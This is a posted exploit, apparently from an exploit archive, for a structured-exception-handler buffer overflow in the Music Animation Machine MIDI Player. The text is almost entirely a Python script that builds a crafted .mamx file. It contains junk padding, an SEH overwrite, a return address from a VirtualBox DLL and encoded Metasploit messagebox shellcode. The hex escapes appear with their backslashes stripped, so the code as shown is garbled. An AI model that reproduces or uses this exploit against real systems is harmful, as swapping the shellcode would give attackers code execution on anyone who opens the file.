Music Animation Machine MIDI Player SEH Buffer Overflow
Posted on 05 January 2011
# Exploit Title: Music Animation Machine MIDI Player MAMX SEH BOF # Date 1/4/2011 # Author: Acidgen mailto:spam(a t h)grayhat.se # Software Link: http://www.musanim.com/player/MAMPlayer2006aug19_035.zip # Version: 2006aug19 Release 035 # Tested on: Windows XP SP2 SE (Virtualbox Version: 3.2.10 Build:r66523) # Credits go to c0d3R'Z, without his released MIDI POC/DoS # (http://www.exploit-db.com/exploits/15897/) # I wouldn't have found this app to play with in the first place. #!/usr/bin/python junk='x41' * 112 seh='xebx06x90x90' pad='x90' * 10 junk2='x42' * 9496 # Sorry for this quick and dirty one; # CALL DWORD PTR SS: EBP+C @ VBOXMRXN.DLL # When in Doubt, find your own pop,pop,ret # VBOXMRXN.DLL Virtualbox Version: 3.2.10 Build:r66523 nseh='xe5xbdx01x10' # msfpayload windows/messagebox # badchars x00xffx1ax0dx0ax09x0bx0cx20 # [*] x86/shikata_ga_nai succeeded with size 364 (iteration=1) pl=("xd9xcexd9x74x24xf4x5bx2bxc9xb8xf4x3axecx53" "xb1x55x31x43x18x83xc3x04x03x43xe0xd8x19x8a" "xe3x86x3bx59xd7x4cx8ax70xa5xdaxdcxbdxadxaf" "x6ex0exa6xc6x9cxe5xcex3ax16xbfx26xc8x56x60" "xbdxf8x9ex2fxd9x71x2cxf6xd8xa8x2dxe8xbaxc1" "xbexcfx1ex5dx7bx2cxd5x35xacx34xe8x5fx27x8e" "xf2x14x62x2fx03xc0x70x1bx4ax9dx43xefx4dx4f" "x9ax10x7cx4fx21x42xfax8fxaex9cxc3xdfx42xa2" "x04x34xa8x9fxf6xefx79x95xe7x7bx23x71xe6x90" "xb2xf2xe4x2dxb0x5fxe8xb0x2dxd4x14x38xb0x03" "x9dx7ax97xcfxfcx41x65xe7xd7x91x03x1dxaexd8" "x7cx50xfexd2x90x3ex16x75x97x40x19x03x2dxbb" "x5ex6ax76x21xd3x14x9ax82x41xf3x2dx35x9axfc" "xbbx8fx6cx6bxd0x63x4cx2ax40x4fxbex82xf4xc7" "xcbxa9x91x65xbbx12x7ex80x32x4cx28x6bx11x95" "x5cx51xc9x2exf6xf4xa4xecx80xe5x12x5fx67x74" "xa5xa0x88x1fx6ax6ax2fxc0xe4xf5xbcx65xc4x9d" "x10x03x48x3bxfdx89xdfx85xddx65x8cx4cx56x56" "x5ax26x08xf3xbaxd0x99x9axd9x48x4ax34x72xe7" "xaaxaexe5x9axcbx5ax9dx07x2cxe2x33xa0x61x91" "xb8x59x4bx82xb6xc6x8fx1ex4fx15xa7x39x2axb4" "x60xaexf5x2bxf8x4ax9dx8bx98xebx7dxa4x72x48" "x31x78xe3x1dx9bxd8xbdxf5x4dx9bx0ex5ex19x3b" "xf0x2axf9x53x94xa1x9cxd7x30x3fx7ex77xa7xd7" "x3axeex55x5cxf3x39x11xd0xd7x9exabx08x26x33" "xc1x8ax1bxe2x44xf4x4bx35xa9x5ax94x63x21x51") buff=junk+seh+nseh+pad+pl+pad+junk2 try: filename = "crash.mamx" print "[-]Music Animation Machine MIDI Player mamx SEH BOF..." print "[-]Version:035 Release name: MAMPlayer2006-aug-19_035" print "[-]Author: Acidgen " print "[*]Generating crashfile:" + filename file = open(filename,"w") file.writelines(buff) file.close() print "[*]Done " except: print "[X]Error..."
